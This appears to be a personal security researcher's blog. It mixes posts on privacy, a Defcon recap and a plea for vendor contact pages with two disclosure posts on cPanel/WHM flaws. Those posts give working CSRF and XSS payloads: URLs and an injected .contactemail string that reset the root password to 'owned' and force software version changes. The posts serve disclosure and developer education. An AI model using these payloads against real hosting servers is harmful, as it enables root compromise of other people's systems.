Privacy Comic

Privacy is a pretty touchy subject for me. In short, I don't really trust anybody who isn't me.

The government has illustrated time and again that they can't keep private data private. Corporate America isn't far behind. As a stereotypical counterculturist, I frankly I don't trust them to use the data in my best interests in the first place.

Anyways, I came across this comic today that nicely illustrates the need for people to be careful with data that they don't think is sensitive.

Defcon Wrapup

So here's the rundown, for those that didn't make it:

My 1-hour flight was delayed 3 hours, so I missed the Toxic BBQ. Don't fly Jet Blue.

Time-based SQL injection is cool. I started playing with it as a way to get around the blindness of blind SQL injection about 6 months back, but these guys are way better than me at it.

Captchas are on the way out. Their usefulness is decaying by the day- most of the big-name ones have been cracked already, and the small ones just aren't worth the effort... yet.

RSnake doesn't like Google. Google doesn't like RSnake. The talk was really good, but mostly not news if you've been following his blog for the past year.

Industrial espionage is cool

iPhones in UPS boxes can be used to penetrate wireless networks from the mailroom. This is cool.

Dan Kaminsky can drink a lot of beer very quickly, but can also disappear quickly. He may be a ninja.

25 years later, WarGames is still cool.

I can still sleep through an entire economics lecture, even if it's about hacker economics.

DNS is broken. More importantly, we rely way too heavily on it. This is bad.

The state of Massachusetts can suppress a talk on breaking the Boston subway system, but they can't suppress one on breaking the Dutch subway system (which uses the same technology). Also, they can't recall the slides from the original talk.

An Open Letter to the Internet

In my day-to-day activities, I often find security vulnerabilities in websites, software, and services.

When I find these issues, I make an effort to contact the affected parties to disclose the vulnerabilities responsibly. Unfortunately, many vendors and website owners do not supply contact information on their site, or make it needlessly difficult to contact.

Back when I built my first website in the mid-90s, it was common practice to supply a webmaster's email address at the bottom of every page, or on a 'contact' page. I don't know why this practice seems to have died out, but it needs to come back.

Website Owners: Please put an email address or at least a contact form on your website for users to contact you regarding technical issues, problems with your website, or other concerns. It is in your best interest to communicate with your audience.

Vendors: Because your service is more complicated than a simple exchange of information with your clients, you have a higher responsibility (believe it or not) to acknowledge and address found issues. Provide a communication channel for users and non-users alike. Allow them to contact you anonymously if they wish. Do not require that they register, have an account, or log in to your website in order to contact you. And please, when you are alerted to an issue, thank the party in question, publicly acknowledge the issue, and fix it. Do not shoot the messenger; fix the problem.

Once a good-faith attempt has been made to disclose the issue, many of us will then make it public. This is bad for you. Don't get caught with your pants down. If you communicate with those who are trying to help, most will wait until you have fixed the issue to make it public.

We are here to help, but we aren't necessarily here to help you.

More Fun With cPanel

I've had a few people contact me about this cPanel exploit- mostly people I'd rather not give further information to (sorry guys, but you're not even very good at being bad guys). Unfortunately, I also don't think anything will get fixed unless it gets made public.

I did some more work on the WHM interface, and it turns out that XSS isn't even necessary to change the root password. It can all be done with CSRF:
http://victim.com:2086/scripts/passwd?user=root&password=owned&password2=owned&submit-domain2=Change+Password

In case you're not familiar with CSRF, it is a vulnerability that is extremely underrated- forcing authenticated users to perform actions for you via well placed links, resource tags, or open redirects.

Let me repeat that: If you are logged into cPanel, and you hit a website that I can embed an image link in (which is nearly every web site out there, these days), I can root your server. I What's more, I won't leave any traces at all, because you actually root the server for me.

This is a big deal.

But it's worse than that. There are plenty of other CSRF holes in the WHM interface. Here, I can force you to download and install arbitrary code from cPanel's servers, downgrading or upgrading your software to a vulnerable version at will:

http://victim.com:2086/scripts2/saveuthemes?themetype=modules&${moduleName}=${versionNumber}

One final point, in case you think needing local access for my permanent XSS hole is too much work, here's a reflected XSS exploit:

http://victim.com:2086/scripts2/confdkillproc?%3Cscript%3Ealert(1337)%3C/script%3E=1&trusted=

Seriously, folks. Web-based management interfaces are a bad idea.

Happy Orange Day

I'll try to avoid political discussions in the future, but I was on the CERT website today, and couldn't help noticing that the national threat level is currently "Orange". I'll be flying down to Defcon tonight and I don't like body-cavity searches, so out of curiosity I clicked through.

The U.S. threat level is High, or Orange, for all domestic and international flights. Only small amounts of liquids, aerosols and gels are allowed in carry-on baggage. See the Transportation Security Administration (TSA) Web site for up-to-date information on items permitted and prohibited on airlines.

There is no credible, specific intelligence suggesting an imminent threat to the homeland at this time.

Um.

Thanks for that, DHS-people. Way to win the 'War on Terror'.

McAfee takes the Pwnie

At Black Hat tonight, McAfee won the Pwnie Award for lamest vendor response.

Good for them. I have to say, they deserve it.

cPanel Root XSS

cPanel is the industry leader in web hosting management software. According to their website, the software is used on "tens of thousands of servers worldwide". Basically, cPanel provides all the traditional UNIX system administration tools through a web-based interface. The interface is very nice, and I have a healthy chunk of respect for the perl-fu of the developers that built it.

From a security aspect, however, the software is flawed by design. The first problem is that mass hosting is the dumbest idea in the world. I'll talk about that in future posts.

The second problem, and the point of this post, is that by combining low-level tools with a web interface, you tend to get the worst of both worlds. An attacker can use techniques from the still-relatively-new domain of web application security to perform old-school attacks that have been fixed many times over.

It turns out that you can, in fact, use cross-site scripting to hack a server

Here's an example. I have quite a few more XSS and CSRF holes, but this should suffice for making my point.

Every cPanel user's account contains a file titled .contactemail in its home directory. This is used to tell the server and administrators who to email when things go south, and can be changed by the user through the cPanel interface, the file manager tool, FTP, or through local scripts. It's only a text file, after all. Assuming we set our email address to:

"onmouseover="alert(1337)

When the friendly system administrator tries to reset our email address (because we forgot our password, obviously), he will receive an alert box in his browser.

But an alert box doesn't really demonstrate anything. Fortunately the WHM (Web Hosting Manager) interface has enough functionality that we can perform just about any system-level task we want. This one will reset the root password to 'owned':

"onmouseover="f=document.forms[0];f.action='/scripts/passwd';f.user.value='root';f.removeChild(f.domain);d=document.createElement('input');f.appendChild(d);d.name='password';d.value='owned';d=document.createElement('input');f.appendChild(d);d.name='password2';d.value='owned';f.submit()

Of course, the only limit is your imagination- WHM can set up cron jobs, add and delete users, send full backups to a server of your choice, and reformat hard drives.

I'll be honest- I like having a web-based administration for servers, routers, printers, and other appliances. Web standards are cross-platform, and browser support is getting better all the time. But do we really need to replace shell-based administration with a web interface? I'm not going to answer "no" right away, but if you're going to do it, you need to be aware of the risks, and awfully careful.

Based on my experiences as both a coder and a penetration tester, a huge majority of developers (even the really good ones) don't understand what security risks there are, much less how to mitigate them. This isn't a problem that is limited to web developers, but it is much more pronounced in that field.

With that in mind, many of my future posts are going to be directed not to other security researchers, but to developers. If they are going to make an interface for managing a server, hopefully they care enough to educate themselves on the risks.

The exploit code above was last tested with cPanel 11.23.4-R26118/WHM 11.23.2 on 8-4-2008.

First In, First Out

At Russ McRee's urging, I've decided to start publishing more of my security research.

The problem is this: I keep finding security issues, and don't have anywhere to put them. The vendors largely ignore me, and there's too much noise with the vulnerability tracking sites like Secunia.

So I'm going to be noisy too.

Don't plan on regular updates, because I only expect to write when I have something to say. That said, I've got a fairly large backlog of things to say. As pretty as the design is, I would just subscribe to the RSS feed if I were you.

I'll try not to disappoint.